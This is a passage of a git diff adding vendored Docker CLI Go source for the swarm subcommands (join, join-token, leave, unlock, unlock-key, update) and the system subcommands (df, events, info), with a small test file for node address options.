{ + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join.go b/vendor/github.com/docker/docker/cli/command/swarm/join.go new file mode 100644 index 0000000000..004313b4c6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/join.go @@ -0,0 +1,69 @@ +package swarm + +import ( + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type joinOptions struct { + remote string + listenAddr NodeAddrOption + // Not a NodeAddrOption because it has no default port. + advertiseAddr string + token string +} + +func newJoinCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := joinOptions{ + listenAddr: NewListenAddrOption(), + } + + cmd := &cobra.Command{ + Use: "join [OPTIONS] HOST:PORT", + Short: "Join a swarm as a node and/or manager", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.remote = args[0] + return runJoin(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") + flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") + flags.StringVar(&opts.token, flagToken, "", "Token for entry into the swarm") + return cmd +} + +func runJoin(dockerCli *command.DockerCli, opts joinOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + req := swarm.JoinRequest{ + JoinToken: opts.token, + ListenAddr: opts.listenAddr.String(), + AdvertiseAddr: opts.advertiseAddr, + RemoteAddrs: []string{opts.remote}, + } + err := client.SwarmJoin(ctx, req) + if err != nil { + return err + } + + info, err := client.Info(ctx) + if 
err != nil { + return err + } + + if info.Swarm.ControlAvailable { + fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a manager.") + } else { + fmt.Fprintln(dockerCli.Out(), "This node joined a swarm as a worker.") + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/join_token.go b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go new file mode 100644 index 0000000000..3a17a8020f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/join_token.go @@ -0,0 +1,105 @@ +package swarm + +import ( + "errors" + "fmt" + + "github.com/spf13/cobra" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "golang.org/x/net/context" +) + +func newJoinTokenCommand(dockerCli *command.DockerCli) *cobra.Command { + var rotate, quiet bool + + cmd := &cobra.Command{ + Use: "join-token [OPTIONS] (worker|manager)", + Short: "Manage join tokens", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + worker := args[0] == "worker" + manager := args[0] == "manager" + + if !worker && !manager { + return errors.New("unknown role " + args[0]) + } + + client := dockerCli.Client() + ctx := context.Background() + + if rotate { + var flags swarm.UpdateFlags + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + flags.RotateWorkerToken = worker + flags.RotateManagerToken = manager + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) + if err != nil { + return err + } + if !quiet { + fmt.Fprintf(dockerCli.Out(), "Successfully rotated %s join token.\n\n", args[0]) + } + } + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + if quiet { + if worker { + fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Worker) + } else { + fmt.Fprintln(dockerCli.Out(), swarm.JoinTokens.Manager) + } + } else { + info, err := client.Info(ctx) + if err != nil { + return err + } + return 
printJoinCommand(ctx, dockerCli, info.Swarm.NodeID, worker, manager) + } + return nil + }, + } + + flags := cmd.Flags() + flags.BoolVar(&rotate, flagRotate, false, "Rotate join token") + flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") + + return cmd +} + +func printJoinCommand(ctx context.Context, dockerCli *command.DockerCli, nodeID string, worker bool, manager bool) error { + client := dockerCli.Client() + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + node, _, err := client.NodeInspectWithRaw(ctx, nodeID) + if err != nil { + return err + } + + if node.ManagerStatus != nil { + if worker { + fmt.Fprintf(dockerCli.Out(), "To add a worker to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Worker, node.ManagerStatus.Addr) + } + if manager { + fmt.Fprintf(dockerCli.Out(), "To add a manager to this swarm, run the following command:\n\n docker swarm join \\\n --token %s \\\n %s\n\n", swarm.JoinTokens.Manager, node.ManagerStatus.Addr) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/leave.go b/vendor/github.com/docker/docker/cli/command/swarm/leave.go new file mode 100644 index 0000000000..e2cfa0a045 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/leave.go @@ -0,0 +1,44 @@ +package swarm + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type leaveOptions struct { + force bool +} + +func newLeaveCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := leaveOptions{} + + cmd := &cobra.Command{ + Use: "leave [OPTIONS]", + Short: "Leave the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runLeave(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force this node to leave the swarm, ignoring 
warnings") + return cmd +} + +func runLeave(dockerCli *command.DockerCli, opts leaveOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + if err := client.SwarmLeave(ctx, opts.force); err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), "Node left the swarm.") + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts.go b/vendor/github.com/docker/docker/cli/command/swarm/opts.go new file mode 100644 index 0000000000..9db46dcf55 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/opts.go @@ -0,0 +1,209 @@ +package swarm + +import ( + "encoding/csv" + "errors" + "fmt" + "strings" + "time" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" +) + +const ( + defaultListenAddr = "0.0.0.0:2377" + + flagCertExpiry = "cert-expiry" + flagDispatcherHeartbeat = "dispatcher-heartbeat" + flagListenAddr = "listen-addr" + flagAdvertiseAddr = "advertise-addr" + flagQuiet = "quiet" + flagRotate = "rotate" + flagToken = "token" + flagTaskHistoryLimit = "task-history-limit" + flagExternalCA = "external-ca" + flagMaxSnapshots = "max-snapshots" + flagSnapshotInterval = "snapshot-interval" + flagLockKey = "lock-key" + flagAutolock = "autolock" +) + +type swarmOptions struct { + taskHistoryLimit int64 + dispatcherHeartbeat time.Duration + nodeCertExpiry time.Duration + externalCA ExternalCAOption + maxSnapshots uint64 + snapshotInterval uint64 + autolock bool +} + +// NodeAddrOption is a pflag.Value for listening addresses +type NodeAddrOption struct { + addr string +} + +// String prints the representation of this flag +func (a *NodeAddrOption) String() string { + return a.Value() +} + +// Set the value for this flag +func (a *NodeAddrOption) Set(value string) error { + addr, err := opts.ParseTCPAddr(value, a.addr) + if err != nil { + return err + } + a.addr = addr + return nil +} + +// Type returns the type of this flag +func (a *NodeAddrOption) 
Type() string { + return "node-addr" +} + +// Value returns the value of this option as addr:port +func (a *NodeAddrOption) Value() string { + return strings.TrimPrefix(a.addr, "tcp://") +} + +// NewNodeAddrOption returns a new node address option +func NewNodeAddrOption(addr string) NodeAddrOption { + return NodeAddrOption{addr} +} + +// NewListenAddrOption returns a NodeAddrOption with default values +func NewListenAddrOption() NodeAddrOption { + return NewNodeAddrOption(defaultListenAddr) +} + +// ExternalCAOption is a Value type for parsing external CA specifications. +type ExternalCAOption struct { + values []*swarm.ExternalCA +} + +// Set parses an external CA option. +func (m *ExternalCAOption) Set(value string) error { + parsed, err := parseExternalCA(value) + if err != nil { + return err + } + + m.values = append(m.values, parsed) + return nil +} + +// Type returns the type of this option. +func (m *ExternalCAOption) Type() string { + return "external-ca" +} + +// String returns a string repr of this option. +func (m *ExternalCAOption) String() string { + externalCAs := []string{} + for _, externalCA := range m.values { + repr := fmt.Sprintf("%s: %s", externalCA.Protocol, externalCA.URL) + externalCAs = append(externalCAs, repr) + } + return strings.Join(externalCAs, ", ") +} + +// Value returns the external CAs +func (m *ExternalCAOption) Value() []*swarm.ExternalCA { + return m.values +} + +// parseExternalCA parses an external CA specification from the command line, +// such as protocol=cfssl,url=https://example.com. 
+func parseExternalCA(caSpec string) (*swarm.ExternalCA, error) { + csvReader := csv.NewReader(strings.NewReader(caSpec)) + fields, err := csvReader.Read() + if err != nil { + return nil, err + } + + externalCA := swarm.ExternalCA{ + Options: make(map[string]string), + } + + var ( + hasProtocol bool + hasURL bool + ) + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + + if len(parts) != 2 { + return nil, fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + key, value := parts[0], parts[1] + + switch strings.ToLower(key) { + case "protocol": + hasProtocol = true + if strings.ToLower(value) == string(swarm.ExternalCAProtocolCFSSL) { + externalCA.Protocol = swarm.ExternalCAProtocolCFSSL + } else { + return nil, fmt.Errorf("unrecognized external CA protocol %s", value) + } + case "url": + hasURL = true + externalCA.URL = value + default: + externalCA.Options[key] = value + } + } + + if !hasProtocol { + return nil, errors.New("the external-ca option needs a protocol= parameter") + } + if !hasURL { + return nil, errors.New("the external-ca option needs a url= parameter") + } + + return &externalCA, nil +} + +func addSwarmFlags(flags *pflag.FlagSet, opts *swarmOptions) { + flags.Int64Var(&opts.taskHistoryLimit, flagTaskHistoryLimit, 5, "Task history retention limit") + flags.DurationVar(&opts.dispatcherHeartbeat, flagDispatcherHeartbeat, time.Duration(5*time.Second), "Dispatcher heartbeat period (ns|us|ms|s|m|h)") + flags.DurationVar(&opts.nodeCertExpiry, flagCertExpiry, time.Duration(90*24*time.Hour), "Validity period for node certificates (ns|us|ms|s|m|h)") + flags.Var(&opts.externalCA, flagExternalCA, "Specifications of one or more certificate signing endpoints") + flags.Uint64Var(&opts.maxSnapshots, flagMaxSnapshots, 0, "Number of additional Raft snapshots to retain") + flags.Uint64Var(&opts.snapshotInterval, flagSnapshotInterval, 10000, "Number of log entries between Raft snapshots") +} + +func (opts *swarmOptions) 
mergeSwarmSpec(spec *swarm.Spec, flags *pflag.FlagSet) { + if flags.Changed(flagTaskHistoryLimit) { + spec.Orchestration.TaskHistoryRetentionLimit = &opts.taskHistoryLimit + } + if flags.Changed(flagDispatcherHeartbeat) { + spec.Dispatcher.HeartbeatPeriod = opts.dispatcherHeartbeat + } + if flags.Changed(flagCertExpiry) { + spec.CAConfig.NodeCertExpiry = opts.nodeCertExpiry + } + if flags.Changed(flagExternalCA) { + spec.CAConfig.ExternalCAs = opts.externalCA.Value() + } + if flags.Changed(flagMaxSnapshots) { + spec.Raft.KeepOldSnapshots = &opts.maxSnapshots + } + if flags.Changed(flagSnapshotInterval) { + spec.Raft.SnapshotInterval = opts.snapshotInterval + } + if flags.Changed(flagAutolock) { + spec.EncryptionConfig.AutoLockManagers = opts.autolock + } +} + +func (opts *swarmOptions) ToSpec(flags *pflag.FlagSet) swarm.Spec { + var spec swarm.Spec + opts.mergeSwarmSpec(&spec, flags) + return spec +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go new file mode 100644 index 0000000000..568dc87302 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/opts_test.go @@ -0,0 +1,37 @@ +package swarm + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestNodeAddrOptionSetHostAndPort(t *testing.T) { + opt := NewNodeAddrOption("old:123") + addr := "newhost:5555" + assert.NilError(t, opt.Set(addr)) + assert.Equal(t, opt.Value(), addr) +} + +func TestNodeAddrOptionSetHostOnly(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set("newhost")) + assert.Equal(t, opt.Value(), "newhost:2377") +} + +func TestNodeAddrOptionSetHostOnlyIPv6(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set("::1")) + assert.Equal(t, opt.Value(), "[::1]:2377") +} + +func TestNodeAddrOptionSetPortOnly(t *testing.T) { + opt := NewListenAddrOption() + assert.NilError(t, opt.Set(":4545")) + assert.Equal(t, opt.Value(), 
"0.0.0.0:4545") +} + +func TestNodeAddrOptionSetInvalidFormat(t *testing.T) { + opt := NewListenAddrOption() + assert.Error(t, opt.Set("http://localhost:4545"), "Invalid") +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go new file mode 100644 index 0000000000..048fb56e3d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock.go @@ -0,0 +1,54 @@ +package swarm + +import ( + "bufio" + "fmt" + "io" + "strings" + + "github.com/spf13/cobra" + "golang.org/x/crypto/ssh/terminal" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "golang.org/x/net/context" +) + +func newUnlockCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "unlock", + Short: "Unlock swarm", + Args: cli.ExactArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + client := dockerCli.Client() + ctx := context.Background() + + key, err := readKey(dockerCli.In(), "Please enter unlock key: ") + if err != nil { + return err + } + req := swarm.UnlockRequest{ + UnlockKey: key, + } + + return client.SwarmUnlock(ctx, req) + }, + } + + return cmd +} + +func readKey(in *command.InStream, prompt string) (string, error) { + if in.IsTerminal() { + fmt.Print(prompt) + dt, err := terminal.ReadPassword(int(in.FD())) + fmt.Println() + return string(dt), err + } + key, err := bufio.NewReader(in).ReadString('\n') + if err == io.EOF { + err = nil + } + return strings.TrimSpace(key), err +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go new file mode 100644 index 0000000000..96450f55b8 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/unlock_key.go @@ -0,0 +1,79 @@ +package swarm + +import ( + "fmt" + + "github.com/spf13/cobra" + + "github.com/docker/docker/api/types/swarm" + 
"github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "golang.org/x/net/context" +) + +func newUnlockKeyCommand(dockerCli *command.DockerCli) *cobra.Command { + var rotate, quiet bool + + cmd := &cobra.Command{ + Use: "unlock-key [OPTIONS]", + Short: "Manage the unlock key", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + client := dockerCli.Client() + ctx := context.Background() + + if rotate { + flags := swarm.UpdateFlags{RotateManagerUnlockKey: true} + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + if !swarm.Spec.EncryptionConfig.AutoLockManagers { + return errors.New("cannot rotate because autolock is not turned on") + } + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, flags) + if err != nil { + return err + } + if !quiet { + fmt.Fprintf(dockerCli.Out(), "Successfully rotated manager unlock key.\n\n") + } + } + + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + + if unlockKeyResp.UnlockKey == "" { + return errors.New("no unlock key is set") + } + + if quiet { + fmt.Fprintln(dockerCli.Out(), unlockKeyResp.UnlockKey) + } else { + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } + return nil + }, + } + + flags := cmd.Flags() + flags.BoolVar(&rotate, flagRotate, false, "Rotate unlock key") + flags.BoolVarP(&quiet, flagQuiet, "q", false, "Only display token") + + return cmd +} + +func printUnlockCommand(ctx context.Context, dockerCli *command.DockerCli, unlockKey string) { + if len(unlockKey) == 0 { + return + } + + fmt.Fprintf(dockerCli.Out(), "To unlock a swarm manager after it restarts, run the `docker swarm unlock`\ncommand and provide the following key:\n\n %s\n\nPlease remember to store this key in a password manager, since without it you\nwill not be able to restart the manager.\n", unlockKey) + return +} diff --git 
a/vendor/github.com/docker/docker/cli/command/swarm/update.go b/vendor/github.com/docker/docker/cli/command/swarm/update.go new file mode 100644 index 0000000000..dbbd268725 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/update.go @@ -0,0 +1,72 @@ +package swarm + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := swarmOptions{} + + cmd := &cobra.Command{ + Use: "update [OPTIONS]", + Short: "Update the swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runUpdate(dockerCli, cmd.Flags(), opts) + }, + PreRunE: func(cmd *cobra.Command, args []string) error { + if cmd.Flags().NFlag() == 0 { + return pflag.ErrHelp + } + return nil + }, + } + + cmd.Flags().BoolVar(&opts.autolock, flagAutolock, false, "Change manager autolocking setting (true|false)") + addSwarmFlags(cmd.Flags(), &opts) + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + var updateFlags swarm.UpdateFlags + + swarm, err := client.SwarmInspect(ctx) + if err != nil { + return err + } + + prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers + + opts.mergeSwarmSpec(&swarm.Spec, flags) + + curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers + + err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags) + if err != nil { + return err + } + + fmt.Fprintln(dockerCli.Out(), "Swarm updated.") + + if curAutoLock && !prevAutoLock { + unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) + if err != nil { + return errors.Wrap(err, "could not fetch unlock key") + } + printUnlockCommand(ctx, dockerCli, unlockKeyResp.UnlockKey) + } 
+ + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go new file mode 100644 index 0000000000..ab3beb895a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/cmd.go @@ -0,0 +1,26 @@ +package system + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSystemCommand returns a cobra command for `system` subcommands +func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "system", + Short: "Manage Docker", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + NewEventsCommand(dockerCli), + NewInfoCommand(dockerCli), + NewDiskUsageCommand(dockerCli), + NewPruneCommand(dockerCli), + ) + + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go new file mode 100644 index 0000000000..9f712484aa --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/df.go @@ -0,0 +1,56 @@ +package system + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type diskUsageOptions struct { + verbose bool +} + +// NewDiskUsageCommand creates a new cobra.Command for `docker df` +func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts diskUsageOptions + + cmd := &cobra.Command{ + Use: "df [OPTIONS]", + Short: "Show docker disk usage", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runDiskUsage(dockerCli, opts) + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage") + + return cmd +} + +func runDiskUsage(dockerCli 
*command.DockerCli, opts diskUsageOptions) error { + du, err := dockerCli.Client().DiskUsage(context.Background()) + if err != nil { + return err + } + + duCtx := formatter.DiskUsageContext{ + Context: formatter.Context{ + Output: dockerCli.Out(), + }, + LayersSize: du.LayersSize, + Images: du.Images, + Containers: du.Containers, + Volumes: du.Volumes, + Verbose: opts.verbose, + } + + duCtx.Write() + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go new file mode 100644 index 0000000000..087523051a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/events.go @@ -0,0 +1,140 @@ +package system + +import ( + "fmt" + "io" + "io/ioutil" + "sort" + "strings" + "text/template" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +type eventsOptions struct { + since string + until string + filter opts.FilterOpt + format string +} + +// NewEventsCommand creates a new cobra.Command for `docker events` +func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := eventsOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "events [OPTIONS]", + Short: "Get real time events from the server", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runEvents(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp") + flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + 
flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template") + + return cmd +} + +func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error { + tmpl, err := makeTemplate(opts.format) + if err != nil { + return cli.StatusError{ + StatusCode: 64, + Status: "Error parsing format: " + err.Error()} + } + options := types.EventsOptions{ + Since: opts.since, + Until: opts.until, + Filters: opts.filter.Value(), + } + + ctx, cancel := context.WithCancel(context.Background()) + events, errs := dockerCli.Client().Events(ctx, options) + defer cancel() + + out := dockerCli.Out() + + for { + select { + case event := <-events: + if err := handleEvent(out, event, tmpl); err != nil { + return err + } + case err := <-errs: + if err == io.EOF { + return nil + } + return err + } + } +} + +func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { + if tmpl == nil { + return prettyPrintEvent(out, event) + } + + return formatEvent(out, event, tmpl) +} + +func makeTemplate(format string) (*template.Template, error) { + if format == "" { + return nil, nil + } + tmpl, err := templates.Parse(format) + if err != nil { + return tmpl, err + } + // we execute the template for an empty message, so as to validate + // a bad template like "{{.badFieldString}}" + return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{}) +} + +// prettyPrintEvent prints all types of event information. +// Each output includes the event type, actor id, name and action. +// Actor attributes are printed at the end if the actor has any. 
+func prettyPrintEvent(out io.Writer, event eventtypes.Message) error { + if event.TimeNano != 0 { + fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + } else if event.Time != 0 { + fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + } + + fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID) + + if len(event.Actor.Attributes) > 0 { + var attrs []string + var keys []string + for k := range event.Actor.Attributes { + keys = append(keys, k) + } + sort.Strings(keys) + for _, k := range keys { + v := event.Actor.Attributes[k] + attrs = append(attrs, fmt.Sprintf("%s=%s", k, v)) + } + fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", ")) + } + fmt.Fprint(out, "\n") + return nil +} + +func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { + defer out.Write([]byte{'\n'}) + return tmpl.Execute(out, event) +} diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go new file mode 100644 index 0000000000..e0b8767377 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/system/info.go @@ -0,0 +1,334 @@ +package system + +import ( + "fmt" + "sort" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/utils" + "github.com/docker/docker/utils/templates" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type infoOptions struct { + format string +} + +// NewInfoCommand creates a new cobra.Command for `docker info` +func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts infoOptions + + cmd := &cobra.Command{ + Use: "info [OPTIONS]", + Short: "Display system-wide information", + Args: cli.NoArgs, + RunE: func(cmd 
*cobra.Command, args []string) error { + return runInfo(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error { + ctx := context.Background() + info, err := dockerCli.Client().Info(ctx) + if err != nil { + return err + } + if opts.format == "" { + return prettyPrintInfo(dockerCli, info) + } + return formatInfo(dockerCli, info, opts.format) +} + +func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error { + fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers) + fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning) + fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused) + fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped) + fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver) + if info.DriverStatus != nil { + for _, pair := range info.DriverStatus { + fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1]) + + // print a warning if devicemapper is using a loopback file + if pair[0] == "Data loop file" { + fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. 
Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.") + } + } + + } + if info.SystemStatus != nil { + for _, pair := range info.SystemStatus { + fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1]) + } + } + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver) + ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver) + + fmt.Fprintf(dockerCli.Out(), "Plugins: \n") + fmt.Fprintf(dockerCli.Out(), " Volume:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + fmt.Fprintf(dockerCli.Out(), " Network:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + + if len(info.Plugins.Authorization) != 0 { + fmt.Fprintf(dockerCli.Out(), " Authorization:") + fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " ")) + fmt.Fprintf(dockerCli.Out(), "\n") + } + + fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState) + if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked { + fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID) + if info.Swarm.Error != "" { + fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error) + } + fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable) + if info.Swarm.ControlAvailable { + fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID) + fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers) + fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes) + fmt.Fprintf(dockerCli.Out(), " Orchestration:\n") + taskHistoryRetentionLimit := int64(0) + if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil { + taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit + } + fmt.Fprintf(dockerCli.Out(), " Task 
